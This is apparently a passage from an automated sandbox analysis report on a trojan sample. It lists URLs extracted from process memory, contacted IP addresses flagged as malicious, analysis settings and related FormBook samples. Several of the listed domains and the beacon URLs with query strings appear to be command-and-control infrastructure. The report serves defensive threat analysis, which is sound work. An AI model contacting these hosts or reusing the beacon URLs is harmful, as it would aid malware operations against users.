https://github.com/dmnd/dedent)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.sklm888.com	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.merchascarpamici.com/ju29/	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.umertazkeer.com	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/lodash/lodash)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/bitstadium/HockeySDK-Android)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.newtek.com/)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/oblador/react-native-keychain)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.merchascarpamici.com/ju29/:	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/DefinitelyTyped/DefinitelyTyped	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/SlexAxton/messageformat.js)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wns.windows.com/	explorer.exe, 00000005.00000000.1237220182.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3728348444.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074166064.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/DovydasNavickas	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://typescriptlang.org	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Microsoft/ReSub)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Sunnyyoung/SYFlatButton)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/facebook/rebound-js)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/lelandrichardson/react-native-safe-module)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000005.00000003.3074623162.000000000C420000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273873854.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2272431891.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3744922659.000000000C42F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1240160729.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074724370.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.wokeeducationhateskids.com	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/necolas/normalize.css/)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/madriska/react-native-quick-actions)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/juliangruber/isarray)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/oysteinkrog/SQLite.Net-PCL)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/open-source-parsers/jsoncpp/)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/opencover/opencover)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://microsoft.github.io/Win2D/html/Introduction.htm)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mnchentampere.com/ju29/	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/mysticatea/event-target-shim)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://github.com/jordanbyron/)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/seegno/google-libphonenumber)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mad4milk.net/	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/facebook/metro)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.dwijtechnology.com/ju29/www.klxcv.xyz	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.unicode.org/cldr/data/.	SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/facebook/immutable-js)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	SecuriteInfo.com.FileRepMalware.16340.31219.exe	false		high
https://github.com/google/gson)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/moment/moment)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/jryans/timers-browserify)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.bodacristianyjuani.com	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.xuangesmd.com/ju29/	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	false		high
https://maps.google.com/maps/api/geocode/json	SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/kjur/jsrsasign)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/facebook/fbjs)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/facebook/regenerator/tree/master/packages/regenerator-runtime)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.mzfgwh.top	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Gozala/events)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/zeux/pugixml)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/hoo29	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/facebook/yoga)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.xuangesmd.com	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/aosp-mirror/platform_development/blob/master/samples/ApiDemos/src/com/example/and	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aka.ms/fabric-assets-license	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.wokeeducationhateskids.com/ju29/	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.dwijtechnology.com/ju29/	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/square/okhttp)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/facebook/react-native)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/google/glog)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/json)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/ide/react-clone-referenced-element)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 00000005.00000000.1236699757.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3723499643.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1235635823.0000000007C70000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/feross/buffer)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.nuget.org/packages/JetBrains.Annotations/10.1.5)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.adjust.com	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/airbnb/lottie-react-native)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/vvakame	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.jetbrains.com	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/airbnb/react-native-maps)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/feross/ieee754)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/phongcao/image-pipeline-windows)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.klxcv.xyz/ju29/	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.klxcv.xyz/ju29/?M2Mp=6lX0R0Q&Bb_=4JvfAS0i2MdEJxbw4NDSiCnJ91CcqWw5bFms	rundll32.exe, 00000006.00000002.3699669578.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3699669578.00000000004C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.townstart.shop/ju29/	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.xuangesmd.comReferer:	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/microsoft/testfx)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
75.2.115.196	www.wokeeducationhateskids.com	United States	16509	AMAZON-02US	true
108.186.24.175	www.sklm888.com	United States	54600	PEGTECHINCUS	true
154.17.26.8	www.xuangesmd.com	United States	54574	DMITUS	true
34.149.87.45	td-ccm-neg-87-45.wixdns.net	United States	2686	ATGS-MMD-ASUS	true
104.17.158.1	ssl1.prod.systemdragon.com	United States	13335	CLOUDFLARENETUS	true
3.33.130.190	glocraze.com	United States	8987	AMAZONEXPANSIONGB	true
198.177.124.40	www.klxcv.xyz	United States	395681	FINALFRONTIERVG	true
103.224.212.216	www.umertazkeer.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1336550
Start date and time:	2023-11-03 12:33:39 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	SecuriteInfo.com.FileRepMalware.16340.31219.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@12/3@12/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 126 Number of non-executed functions: 171
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.16, 23.218.218.190, 23.218.218.158, 23.218.218.148
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com, www.msftncsi.com.edgesuite.net, ocsp.digicert.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, ncsi-geo.trafficmanager.net, www.msftconnecttest.com, l-0007.l-msedge.net, config.edge.skype.com, a1961.g2.akamai.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:34:51	API Interceptor	6547937x Sleep call for process: explorer.exe modified
14:30:42	API Interceptor	6809209x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
75.2.115.196	#U00f6deme_talimat#U0131.exe	Get hash	malicious	FormBook	Browse	www.gamebaidoithuong81.net/dz01/?uVdD1=YMOmdhSwndWCdTRrZByHpwsNCsdFmAkVHs1I8KDVv6p76JxAIuTZWEQkjCszFbHRIEPV&U2JH4=MtxdApUP-NXPklNP
	VCpYN6lZjV.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.52iwin.win/ge06/?GzrL=3xoI/B6CQoLdvz6I1QncmX9MP1HhWXk9QV/Cy1061GZM9Tl3nu1AsvBYpd4XaAt8mBsC&zHO=-ZddoRKxcZ8d2
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.4081.11101.rtf	Get hash	malicious	FormBook, NSISDropper	Browse	www.52iwin.win/ge06/?M4utZ=Nbv4vNO&Qntd4=3xoI/B6CM4PZvTyP3QncmX9MP1HhWXk9QVnSu2o7xmZN9iJxg+kM6r5aq4UrBgZPpA5yZg==
	sipari#U015f_onay#U0131.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.gamebaidoithuong81.net/dz01/?jFNl2n5=YMOmdhSwndWCdTRrZByHpwsNCsdFmAkVHs1I8KDVv6p76JxAIuTZWEQkjBMsO7XpSjyf&lZ3=p2MptpHXqrVlbPUp
	Payment_Advice.exe	Get hash	malicious	FormBook	Browse	www.87b52.club/hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLx
	F#U0130YAT_TALEB#U0130-SALTIKMAKINA__AS_BESTKALIP_A.S.exe	Get hash	malicious	FormBook, RedLine	Browse	www.hybridrate.com/bz24/
	Fiyat_Teklif_Erymetal_A.s_MKLoO8887.exe	Get hash	malicious	FormBook, RedLine	Browse	www.hybridrate.com/bz24/
	SecuriteInfo.com.Variant.Jaik.39057.4222.31519.exe	Get hash	malicious	Unknown	Browse	hostinga.imagecross.com/image-hosting-17/3keny.jpeg
	ir4uOmf7Ic.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.92dbxvhr.xyz/be03/?YfxhA2W=yZ2tR2aIub077a/vy7woE3/H7uql4cqd+BdZnWiuASMC0GCzjDrlE7a20IxpmNqzo2aw&5jutZ=0txPa
	PO-371240523.exe	Get hash	malicious	FormBook	Browse	www.loiioo1.site/ca82/?W4=aDgxtMAVqgZllSWLFyeRl6lh+EK1aUkDjIUC5rmnbdl5K86wqQ19w1O/sKDk3IY+RFc/&u0DH=aL3TSZm0nZvtOrTp
	PO_383822.doc	Get hash	malicious	FormBook	Browse	www.batbatbat.net/sd03/?f4G0dr7=+n333/Os3+ZENO7ZV6T7++SqVJMU9gaNd8RrIz+AORJhv5tCRvqdHL7xPS0FOmBOCaqBcA==&fpEL6P=fR-XynpxGjH0rtQp
	copy_PDF.exe	Get hash	malicious	FormBook	Browse	www.dp77.shop/he2a/?nTthCt=Nb/FKU1zdQBN+CSQ9lNkfNv7NMoqSEbAcLfmG2wKmrccvHfopsPLt/BWV5dbdU3xRW6p&s4ND=W48hC
	php.ini	Get hash	malicious	Unknown	Browse	pitch.events/
